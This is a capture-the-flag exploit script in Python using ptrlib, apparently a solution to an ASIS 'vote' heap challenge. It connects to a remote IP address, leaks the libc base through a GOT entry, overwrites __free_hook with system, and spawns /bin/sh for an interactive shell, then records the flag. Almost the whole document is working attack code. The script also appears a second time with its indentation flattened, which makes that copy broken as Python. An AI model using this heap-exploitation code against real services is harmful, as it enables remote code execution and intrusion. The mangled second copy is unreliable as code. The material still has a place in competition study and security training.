ptr-yudai/exploit.py

## exploit.py
from ptrlib import *

"""
typedef struct {
  unsigned long id;
  std::string candidate;
  std::string state;
  std::string gender;
  long age;
  bool employed;
} Vote;
"""

def vote(employed, age, gender, state, candidate):
    sock.sendlineafter("> ", "5")
    sock.recvline()
    sock.sendline('y' if employed else 'n')
    sock.recvline()
    sock.sendline(str(age))
    sock.recvline()
    sock.sendline(gender)
    sock.recvline()
    sock.sendline(state)
    sock.recvline()
    sock.sendline(candidate)
    return int(sock.recvlineafter("ID is ")[:-1], 16)
def update(voteid, gender):
    sock.sendlineafter("> ", "4")
    sock.sendlineafter(": ", hex(voteid))
    old = sock.recvlineafter(": ")
    sock.recvline()
    sock.sendline(gender)
    return old
def delete(voteid):
    sock.sendlineafter("> ", "3")
    sock.sendlineafter(": ", hex(voteid))

import random
import string

randstr = lambda n: ''.join([random.choice(string.ascii_letters)
                             for i in range(n)])

elf = ELF("./vote")
"""
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
sock = Process("./vote")
"""
libc = ELF("libc6_2.27-3ubuntu1.4_amd64.so")
sock = Socket("69.90.132.248", 3371)
#"""

votes = []
rop_nop = 0x0040201a

# reallocate votes
logger.info("Reallocating...")
for i in range(0x33):
    votes.append(vote(True, 0xdead, "AAAAAAAA", "BBBBBBBB", "CCCCCCCC"))

# libc leak
logger.info("Leaking...")
payload  = b"A" * 0x98
payload += p64(0xdeadbeefcafebabe) # voteid
payload += p64(0xffffffffcafebabe) # candidate
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0xffffffffdeadbeef) # state
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(elf.got('tolower')) # gender
payload += p64(8)
payload += p64(8)
payload += b"0" * (0xf8 - len(payload))
vote(True, 0xcafe, "A", "B", payload)
libc_base = u64(update(0xdeadbeefcafebabe, p64(rop_nop))) - libc.symbol("tolower")
logger.info("libc = " + hex(libc_base))

# overwrite free hook
logger.info("Pwning...")
payload  = b"B" * 0x20
payload += p64(0xcafebabedeadbeef) # voteid
payload += p64(0xffffffffcafebabe) # candidate
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0xffffffffdeadbeef) # state
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(libc_base + libc.symbol("__free_hook")) # gender
payload += p64(0xf)
payload += p64(0xf)
payload += b"0" * (0xf8 - len(payload))
vote(True, 0xcafe, "A", "B", payload)
update(0xcafebabedeadbeef, p64(libc_base + libc.symbol("system")))

voteid = vote(True, 0xcafe, "A", "B", "C")
update(voteid, "/bin/sh\0" * 4)

sock.interactive()

# ASIS{v0t3_vEc7Or_Nev3R_93T_uPd4t3D!!}
	from ptrlib import *

	"""
	typedef struct {
	unsigned long id;
	std::string candidate;
	std::string state;
	std::string gender;
	long age;
	bool employed;
	} Vote;
	"""

	def vote(employed, age, gender, state, candidate):
	sock.sendlineafter("> ", "5")
	sock.recvline()
	sock.sendline('y' if employed else 'n')
	sock.recvline()
	sock.sendline(str(age))
	sock.recvline()
	sock.sendline(gender)
	sock.recvline()
	sock.sendline(state)
	sock.recvline()
	sock.sendline(candidate)
	return int(sock.recvlineafter("ID is ")[:-1], 16)
	def update(voteid, gender):
	sock.sendlineafter("> ", "4")
	sock.sendlineafter(": ", hex(voteid))
	old = sock.recvlineafter(": ")
	sock.recvline()
	sock.sendline(gender)
	return old
	def delete(voteid):
	sock.sendlineafter("> ", "3")
	sock.sendlineafter(": ", hex(voteid))

	import random
	import string

	randstr = lambda n: ''.join([random.choice(string.ascii_letters)
	for i in range(n)])

	elf = ELF("./vote")
	"""
	libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
	sock = Process("./vote")
	"""
	libc = ELF("libc6_2.27-3ubuntu1.4_amd64.so")
	sock = Socket("69.90.132.248", 3371)
	#"""

	votes = []
	rop_nop = 0x0040201a

	# reallocate votes
	logger.info("Reallocating...")
	for i in range(0x33):
	votes.append(vote(True, 0xdead, "AAAAAAAA", "BBBBBBBB", "CCCCCCCC"))

	# libc leak
	logger.info("Leaking...")
	payload = b"A" * 0x98
	payload += p64(0xdeadbeefcafebabe) # voteid
	payload += p64(0xffffffffcafebabe) # candidate
	payload += p64(0)
	payload += p64(0)
	payload += p64(0)
	payload += p64(0xffffffffdeadbeef) # state
	payload += p64(0)
	payload += p64(0)
	payload += p64(0)
	payload += p64(elf.got('tolower')) # gender
	payload += p64(8)
	payload += p64(8)
	payload += b"0" * (0xf8 - len(payload))
	vote(True, 0xcafe, "A", "B", payload)
	libc_base = u64(update(0xdeadbeefcafebabe, p64(rop_nop))) - libc.symbol("tolower")
	logger.info("libc = " + hex(libc_base))

	# overwrite free hook
	logger.info("Pwning...")
	payload = b"B" * 0x20
	payload += p64(0xcafebabedeadbeef) # voteid
	payload += p64(0xffffffffcafebabe) # candidate
	payload += p64(0)
	payload += p64(0)
	payload += p64(0)
	payload += p64(0xffffffffdeadbeef) # state
	payload += p64(0)
	payload += p64(0)
	payload += p64(0)
	payload += p64(libc_base + libc.symbol("__free_hook")) # gender
	payload += p64(0xf)
	payload += p64(0xf)
	payload += b"0" * (0xf8 - len(payload))
	vote(True, 0xcafe, "A", "B", payload)
	update(0xcafebabedeadbeef, p64(libc_base + libc.symbol("system")))

	voteid = vote(True, 0xcafe, "A", "B", "C")
	update(voteid, "/bin/sh\0" * 4)

	sock.interactive()

	# ASIS{v0t3_vEc7Or_Nev3R_93T_uPd4t3D!!}